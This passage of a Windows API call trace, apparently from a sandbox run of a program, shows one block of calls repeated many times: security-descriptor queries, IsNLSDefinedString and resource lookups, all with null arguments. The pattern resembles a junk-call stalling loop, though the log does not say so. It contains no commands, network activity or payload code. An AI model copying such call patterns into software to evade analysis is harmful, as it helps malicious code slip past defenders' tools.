ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.112] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.112] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.112] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.112] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.112] LockResource (hResData=0x0) returned 0x0 [0220.112] FreeResource (hResData=0x0) returned 0 [0220.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.113] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.113] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.113] FreeResource (hResData=0x0) returned 0 [0220.113] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.113] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.113] LockResource (hResData=0x0) returned 0x0 [0220.114] FreeResource (hResData=0x0) returned 0 [0220.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.114] LockResource (hResData=0x0) returned 0x0 [0220.114] FreeResource (hResData=0x0) returned 0 [0220.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.114] LockResource (hResData=0x0) returned 0x0 [0220.114] FreeResource (hResData=0x0) returned 0 [0220.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.114] LockResource (hResData=0x0) returned 0x0 [0220.114] FreeResource (hResData=0x0) returned 0 [0220.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.114] LockResource (hResData=0x0) returned 0x0 [0220.114] FreeResource (hResData=0x0) returned 0 [0220.114] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.114] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.114] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.114] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.114] LockResource (hResData=0x0) returned 0x0 [0220.114] FreeResource (hResData=0x0) returned 0 [0220.114] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.114] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.115] LockResource (hResData=0x0) returned 0x0 [0220.115] FreeResource (hResData=0x0) returned 0 [0220.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.115] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.115] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.115] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.115] LockResource (hResData=0x0) returned 0x0 [0220.115] FreeResource (hResData=0x0) returned 0 [0220.115] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.115] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.115] LockResource (hResData=0x0) returned 0x0 [0220.115] FreeResource (hResData=0x0) returned 0 [0220.115] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.116] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.116] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.116] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.116] LockResource (hResData=0x0) returned 0x0 [0220.116] FreeResource (hResData=0x0) returned 0 [0220.116] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.117] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.117] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.117] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.117] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.117] LockResource (hResData=0x0) returned 0x0 [0220.117] FreeResource (hResData=0x0) returned 0 [0220.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.118] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.118] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.118] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.118] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.118] LockResource (hResData=0x0) returned 0x0 [0220.118] FreeResource (hResData=0x0) returned 0 [0220.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.119] 